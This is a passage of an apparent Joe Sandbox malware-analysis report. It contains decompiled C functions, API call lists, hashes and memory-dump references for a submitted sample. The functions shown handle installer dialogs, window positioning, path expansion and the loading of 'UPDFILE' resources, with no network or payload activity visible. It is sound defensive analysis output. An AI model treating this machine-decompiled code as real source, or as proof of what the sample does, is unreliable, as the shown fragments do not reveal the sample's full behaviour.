                                                                                                                                                                                                      					E000E43D0(_t24, _t12);
                                                                                                                                                                                                      					SetWindowTextA(_t24, "cent");
                                                                                                                                                                                                      					SetDlgItemTextA(_t24, 0x838,  *0xe9404);
                                                                                                                                                                                                      					SetForegroundWindow(_t24);
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t11 == 1) {
                                                                                                                                                                                                      					_t22 = _a12;
                                                                                                                                                                                                      					if(_t22 < 6) {
                                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t22 <= 7) {
                                                                                                                                                                                                      						L8:
                                                                                                                                                                                                      						EndDialog(_a4, _t22);
                                                                                                                                                                                                      						return 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t22 != 0x839) {
                                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *0xe91dc = 1;
                                                                                                                                                                                                      					goto L8;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}








                                                                                                                                                                                                      0x000e3459
                                                                                                                                                                                                      0x000e345c
                                                                                                                                                                                                      0x000e34d8
                                                                                                                                                                                                      0x000e34de
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e34e0
                                                                                                                                                                                                      0x000e345e
                                                                                                                                                                                                      0x000e3463
                                                                                                                                                                                                      0x000e349a
                                                                                                                                                                                                      0x000e34a0
                                                                                                                                                                                                      0x000e34a7
                                                                                                                                                                                                      0x000e34b2
                                                                                                                                                                                                      0x000e34c4
                                                                                                                                                                                                      0x000e34cb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e34cb
                                                                                                                                                                                                      0x000e3468
                                                                                                                                                                                                      0x000e346e
                                                                                                                                                                                                      0x000e3474
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e347c
                                                                                                                                                                                                      0x000e348c
                                                                                                                                                                                                      0x000e3490
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3496
                                                                                                                                                                                                      0x000e3484
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3486
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3486
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 000E3490
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 000E349A
                                                                                                                                                                                                      • SetWindowTextA.USER32(?,cent), ref: 000E34B2
                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,00000838), ref: 000E34C4
                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 000E34CB
                                                                                                                                                                                                      • EndDialog.USER32(?,00000002), ref: 000E34D8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                      • String ID: cent
                                                                                                                                                                                                      • API String ID: 852535152-3940384054
                                                                                                                                                                                                      • Opcode ID: e7f3b39e2630cd8e0330d45507f646239618fcadc12e2b15959bbdd93875e215
                                                                                                                                                                                                      • Instruction ID: e81af439c21ae1da75db2cc475b02072884e40e31ace7104190c0938a78280a1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e7f3b39e2630cd8e0330d45507f646239618fcadc12e2b15959bbdd93875e215
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE0192B13401D4AFE7265F66DC4C96D3E94EB4AB01F004014FA46BB5E0C634BF41C782
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                      			E000E2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t16;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				char _t32;
                                                                                                                                                                                                      				intOrPtr _t34;
                                                                                                                                                                                                      				char* _t38;
                                                                                                                                                                                                      				char _t42;
                                                                                                                                                                                                      				char* _t44;
                                                                                                                                                                                                      				CHAR* _t52;
                                                                                                                                                                                                      				intOrPtr* _t55;
                                                                                                                                                                                                      				CHAR* _t59;
                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                      				CHAR* _t64;
                                                                                                                                                                                                      				CHAR* _t65;
                                                                                                                                                                                                      				signed int _t66;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t60 = __edx;
                                                                                                                                                                                                      				_t16 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                      				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                      				_t65 = _a4;
                                                                                                                                                                                                      				_t44 = __edx;
                                                                                                                                                                                                      				_t64 = __ecx;
                                                                                                                                                                                                      				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                      					GetModuleFileNameA( *0xe9a3c,  &_v268, 0x104);
                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                      						_t17 =  *_t64;
                                                                                                                                                                                                      						if(_t17 == 0) {
                                                                                                                                                                                                      							break;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                      						 *_t65 =  *_t64;
                                                                                                                                                                                                      						if(_t21 != 0) {
                                                                                                                                                                                                      							_t65[1] = _t64[1];
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if( *_t64 != 0x23) {
                                                                                                                                                                                                      							L19:
                                                                                                                                                                                                      							_t65 = CharNextA(_t65);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t64 = CharNextA(_t64);
                                                                                                                                                                                                      							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                      								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                      									if( *_t64 == 0x23) {
                                                                                                                                                                                                      										goto L19;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									E000E1680(_t65, E000E17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                      									_t52 = _t65;
                                                                                                                                                                                                      									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                      									_t60 = _t14;
                                                                                                                                                                                                      									do {
                                                                                                                                                                                                      										_t32 =  *_t52;
                                                                                                                                                                                                      										_t52 =  &(_t52[1]);
                                                                                                                                                                                                      									} while (_t32 != 0);
                                                                                                                                                                                                      									goto L17;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								E000E65E8( &_v268);
                                                                                                                                                                                                      								_t55 =  &_v268;
                                                                                                                                                                                                      								_t62 = _t55 + 1;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t34 =  *_t55;
                                                                                                                                                                                                      									_t55 = _t55 + 1;
                                                                                                                                                                                                      								} while (_t34 != 0);
                                                                                                                                                                                                      								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                      								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                      									 *_t38 = 0;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								E000E1680(_t65, E000E17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                      								_t59 = _t65;
                                                                                                                                                                                                      								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                      								_t60 = _t12;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t42 =  *_t59;
                                                                                                                                                                                                      									_t59 =  &(_t59[1]);
                                                                                                                                                                                                      								} while (_t42 != 0);
                                                                                                                                                                                                      								L17:
                                                                                                                                                                                                      								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t64 = CharNextA(_t64);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *_t65 = _t17;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E000E6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                      			}






















                                                                                                                                                                                                      0x000e2aac
                                                                                                                                                                                                      0x000e2ab7
                                                                                                                                                                                                      0x000e2abc
                                                                                                                                                                                                      0x000e2abe
                                                                                                                                                                                                      0x000e2ac3
                                                                                                                                                                                                      0x000e2ac6
                                                                                                                                                                                                      0x000e2ac9
                                                                                                                                                                                                      0x000e2ace
                                                                                                                                                                                                      0x000e2ae6
                                                                                                                                                                                                      0x000e2bdc
                                                                                                                                                                                                      0x000e2bdc
                                                                                                                                                                                                      0x000e2be0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2af2
                                                                                                                                                                                                      0x000e2afc
                                                                                                                                                                                                      0x000e2b00
                                                                                                                                                                                                      0x000e2b05
                                                                                                                                                                                                      0x000e2b05
                                                                                                                                                                                                      0x000e2b0b
                                                                                                                                                                                                      0x000e2bca
                                                                                                                                                                                                      0x000e2bd1
                                                                                                                                                                                                      0x000e2b11
                                                                                                                                                                                                      0x000e2b18
                                                                                                                                                                                                      0x000e2b26
                                                                                                                                                                                                      0x000e2b99
                                                                                                                                                                                                      0x000e2bc8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2b9b
                                                                                                                                                                                                      0x000e2bae
                                                                                                                                                                                                      0x000e2bb3
                                                                                                                                                                                                      0x000e2bb5
                                                                                                                                                                                                      0x000e2bb5
                                                                                                                                                                                                      0x000e2bb8
                                                                                                                                                                                                      0x000e2bb8
                                                                                                                                                                                                      0x000e2bba
                                                                                                                                                                                                      0x000e2bbb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2bb8
                                                                                                                                                                                                      0x000e2b28
                                                                                                                                                                                                      0x000e2b2e
                                                                                                                                                                                                      0x000e2b33
                                                                                                                                                                                                      0x000e2b39
                                                                                                                                                                                                      0x000e2b3c
                                                                                                                                                                                                      0x000e2b3c
                                                                                                                                                                                                      0x000e2b3e
                                                                                                                                                                                                      0x000e2b3f
                                                                                                                                                                                                      0x000e2b55
                                                                                                                                                                                                      0x000e2b5d
                                                                                                                                                                                                      0x000e2b64
                                                                                                                                                                                                      0x000e2b64
                                                                                                                                                                                                      0x000e2b7a
                                                                                                                                                                                                      0x000e2b7f
                                                                                                                                                                                                      0x000e2b81
                                                                                                                                                                                                      0x000e2b81
                                                                                                                                                                                                      0x000e2b84
                                                                                                                                                                                                      0x000e2b84
                                                                                                                                                                                                      0x000e2b86
                                                                                                                                                                                                      0x000e2b87
                                                                                                                                                                                                      0x000e2bbf
                                                                                                                                                                                                      0x000e2bc1
                                                                                                                                                                                                      0x000e2bc1
                                                                                                                                                                                                      0x000e2b26
                                                                                                                                                                                                      0x000e2bda
                                                                                                                                                                                                      0x000e2bda
                                                                                                                                                                                                      0x000e2be6
                                                                                                                                                                                                      0x000e2be6
                                                                                                                                                                                                      0x000e2bf8

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 000E2AE6
                                                                                                                                                                                                      • IsDBCSLeadByte.KERNEL32(00000000), ref: 000E2AF2
                                                                                                                                                                                                      • CharNextA.USER32(?), ref: 000E2B12
                                                                                                                                                                                                      • CharUpperA.USER32 ref: 000E2B1E
                                                                                                                                                                                                      • CharPrevA.USER32(?,?), ref: 000E2B55
                                                                                                                                                                                                      • CharNextA.USER32(?), ref: 000E2BD4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 571164536-0
                                                                                                                                                                                                      • Opcode ID: c26f46c2bcc93c70b773b7db6f7091ea0d7e704aab74d169a31710e9371fa713
                                                                                                                                                                                                      • Instruction ID: 41305f58969cc939082b495021ba86a3f8fdd5e19ee48cd0b0b0ae0892c3f7c3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c26f46c2bcc93c70b773b7db6f7091ea0d7e704aab74d169a31710e9371fa713
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D4124342082C55EEB559F308C54AFE7BAD9F57700F0440DAE8C2B7202DB395E86CBA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                      			E000E43D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				struct tagRECT _v24;
                                                                                                                                                                                                      				struct tagRECT _v40;
                                                                                                                                                                                                      				struct HWND__* _v44;
                                                                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                                                                      				int _v52;
                                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                                      				int _v60;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t29;
                                                                                                                                                                                                      				void* _t53;
                                                                                                                                                                                                      				intOrPtr _t56;
                                                                                                                                                                                                      				int _t59;
                                                                                                                                                                                                      				struct HWND__* _t63;
                                                                                                                                                                                                      				struct HWND__* _t67;
                                                                                                                                                                                                      				struct HWND__* _t68;
                                                                                                                                                                                                      				struct HDC__* _t69;
                                                                                                                                                                                                      				int _t72;
                                                                                                                                                                                                      				signed int _t74;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t63 = __edx;
                                                                                                                                                                                                      				_t29 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                      				_t68 = __edx;
                                                                                                                                                                                                      				_v44 = __ecx;
                                                                                                                                                                                                      				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                      				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                      				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                      				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                      				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                      				_t69 = GetDC(_v44);
                                                                                                                                                                                                      				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                      				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                      				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                      				_t56 = _v48;
                                                                                                                                                                                                      				asm("cdq");
                                                                                                                                                                                                      				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                      				_t67 = 0;
                                                                                                                                                                                                      				if(_t72 >= 0) {
                                                                                                                                                                                                      					_t63 = _v52;
                                                                                                                                                                                                      					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                      						_t72 = _t63 - _t56;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t72 = _t67;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				asm("cdq");
                                                                                                                                                                                                      				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                      				if(_t59 >= 0) {
                                                                                                                                                                                                      					_t63 = _v60;
                                                                                                                                                                                                      					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                      						_t59 = _t63 - _t53;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t59 = _t67;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E000E6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                      			}
























                                                                                                                                                                                                      0x000e43d0
                                                                                                                                                                                                      0x000e43d8
                                                                                                                                                                                                      0x000e43df
                                                                                                                                                                                                      0x000e43e6
                                                                                                                                                                                                      0x000e43ec
                                                                                                                                                                                                      0x000e43f1
                                                                                                                                                                                                      0x000e4400
                                                                                                                                                                                                      0x000e4403
                                                                                                                                                                                                      0x000e440b
                                                                                                                                                                                                      0x000e4420
                                                                                                                                                                                                      0x000e4429
                                                                                                                                                                                                      0x000e4437
                                                                                                                                                                                                      0x000e4444
                                                                                                                                                                                                      0x000e4447
                                                                                                                                                                                                      0x000e444d
                                                                                                                                                                                                      0x000e4454
                                                                                                                                                                                                      0x000e445b
                                                                                                                                                                                                      0x000e4460
                                                                                                                                                                                                      0x000e4461
                                                                                                                                                                                                      0x000e4467
                                                                                                                                                                                                      0x000e446f
                                                                                                                                                                                                      0x000e4473
                                                                                                                                                                                                      0x000e4473
                                                                                                                                                                                                      0x000e4463
                                                                                                                                                                                                      0x000e4463
                                                                                                                                                                                                      0x000e4463
                                                                                                                                                                                                      0x000e447a
                                                                                                                                                                                                      0x000e4481
                                                                                                                                                                                                      0x000e4484
                                                                                                                                                                                                      0x000e448a
                                                                                                                                                                                                      0x000e4492
                                                                                                                                                                                                      0x000e4496
                                                                                                                                                                                                      0x000e4496
                                                                                                                                                                                                      0x000e4486
                                                                                                                                                                                                      0x000e4486
                                                                                                                                                                                                      0x000e4486
                                                                                                                                                                                                      0x000e44b8

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 000E43F1
                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 000E440B
                                                                                                                                                                                                      • GetDC.USER32(?), ref: 000E4423
                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 000E442E
                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 000E443A
                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 000E4447
                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 000E44A2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2212493051-0
                                                                                                                                                                                                      • Opcode ID: 308d7a2c92e61fca079ae3450dfe4ce7ac375832eae95f95ba28db07e8dc28f6
                                                                                                                                                                                                      • Instruction ID: 572497729630e892d803005f208fbf5914440564a32183089d72ac4c6356137d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 308d7a2c92e61fca079ae3450dfe4ce7ac375832eae95f95ba28db07e8dc28f6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3316C72F00159AFDB14CFB8DD889EEBBB5EB89310F154169F805F7280DA34AD058B60
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 53%
                                                                                                                                                                                                      			E000E6298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v28;
                                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                                      				struct HINSTANCE__* _v36;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t16;
                                                                                                                                                                                                      				struct HRSRC__* _t21;
                                                                                                                                                                                                      				intOrPtr _t26;
                                                                                                                                                                                                      				void* _t30;
                                                                                                                                                                                                      				struct HINSTANCE__* _t36;
                                                                                                                                                                                                      				intOrPtr* _t40;
                                                                                                                                                                                                      				void* _t41;
                                                                                                                                                                                                      				intOrPtr* _t44;
                                                                                                                                                                                                      				intOrPtr* _t45;
                                                                                                                                                                                                      				void* _t47;
                                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                                      				struct HINSTANCE__* _t51;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t44 = __edx;
                                                                                                                                                                                                      				_t16 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                      				_t46 = 0;
                                                                                                                                                                                                      				_v32 = __ecx;
                                                                                                                                                                                                      				_v36 = 0;
                                                                                                                                                                                                      				_t36 = 1;
                                                                                                                                                                                                      				E000E171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					_t51 = _t51 + 0x10;
                                                                                                                                                                                                      					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                      					if(_t21 == 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                      					if(_t45 == 0) {
                                                                                                                                                                                                      						 *0xe9124 = 0x80070714;
                                                                                                                                                                                                      						_t36 = _t46;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                      						_t44 = _t5;
                                                                                                                                                                                                      						_t40 = _t44;
                                                                                                                                                                                                      						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                      						_t47 = _t6;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t26 =  *_t40;
                                                                                                                                                                                                      							_t40 = _t40 + 1;
                                                                                                                                                                                                      						} while (_t26 != 0);
                                                                                                                                                                                                      						_t41 = _t40 - _t47;
                                                                                                                                                                                                      						_t46 = _t51;
                                                                                                                                                                                                      						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                      						 *0xea288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                      						_t30 = _v32();
                                                                                                                                                                                                      						if(_t51 != _t51) {
                                                                                                                                                                                                      							asm("int 0x29");
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_push(_t45);
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							_t36 = 0;
                                                                                                                                                                                                      							FreeResource(??);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							FreeResource();
                                                                                                                                                                                                      							_v36 = _v36 + 1;
                                                                                                                                                                                                      							E000E171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                      							_t46 = 0;
                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					return E000E6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L12;
                                                                                                                                                                                                      			}






















                                                                                                                                                                                                      0x000e6298
                                                                                                                                                                                                      0x000e62a0
                                                                                                                                                                                                      0x000e62a7
                                                                                                                                                                                                      0x000e62ad
                                                                                                                                                                                                      0x000e62af
                                                                                                                                                                                                      0x000e62bb
                                                                                                                                                                                                      0x000e62c3
                                                                                                                                                                                                      0x000e62c4
                                                                                                                                                                                                      0x000e633b
                                                                                                                                                                                                      0x000e633b
                                                                                                                                                                                                      0x000e6345
                                                                                                                                                                                                      0x000e634d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e62da
                                                                                                                                                                                                      0x000e62de
                                                                                                                                                                                                      0x000e635f
                                                                                                                                                                                                      0x000e6369
                                                                                                                                                                                                      0x000e62e0
                                                                                                                                                                                                      0x000e62e0
                                                                                                                                                                                                      0x000e62e0
                                                                                                                                                                                                      0x000e62e3
                                                                                                                                                                                                      0x000e62e5
                                                                                                                                                                                                      0x000e62e5
                                                                                                                                                                                                      0x000e62e8
                                                                                                                                                                                                      0x000e62e8
                                                                                                                                                                                                      0x000e62ea
                                                                                                                                                                                                      0x000e62eb
                                                                                                                                                                                                      0x000e62ef
                                                                                                                                                                                                      0x000e62f1
                                                                                                                                                                                                      0x000e62f3
                                                                                                                                                                                                      0x000e6302
                                                                                                                                                                                                      0x000e6308
                                                                                                                                                                                                      0x000e630d
                                                                                                                                                                                                      0x000e6314
                                                                                                                                                                                                      0x000e6314
                                                                                                                                                                                                      0x000e6316
                                                                                                                                                                                                      0x000e6319
                                                                                                                                                                                                      0x000e6355
                                                                                                                                                                                                      0x000e6357
                                                                                                                                                                                                      0x000e631b
                                                                                                                                                                                                      0x000e631b
                                                                                                                                                                                                      0x000e6331
                                                                                                                                                                                                      0x000e6334
                                                                                                                                                                                                      0x000e6339
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e6339
                                                                                                                                                                                                      0x000e6319
                                                                                                                                                                                                      0x000e636b
                                                                                                                                                                                                      0x000e637d
                                                                                                                                                                                                      0x000e637d
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 000E171E: _vsnprintf.MSVCRT ref: 000E1750
                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,000E51CA,00000004,00000024,000E2F71,?,00000002,00000000), ref: 000E62CD
                                                                                                                                                                                                      • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,000E51CA,00000004,00000024,000E2F71,?,00000002,00000000), ref: 000E62D4
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,000E51CA,00000004,00000024,000E2F71,?,00000002,00000000), ref: 000E631B
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 000E6345
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,000E51CA,00000004,00000024,000E2F71,?,00000002,00000000), ref: 000E6357
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                      • String ID: UPDFILE%lu
                                                                                                                                                                                                      • API String ID: 2922116661-2329316264
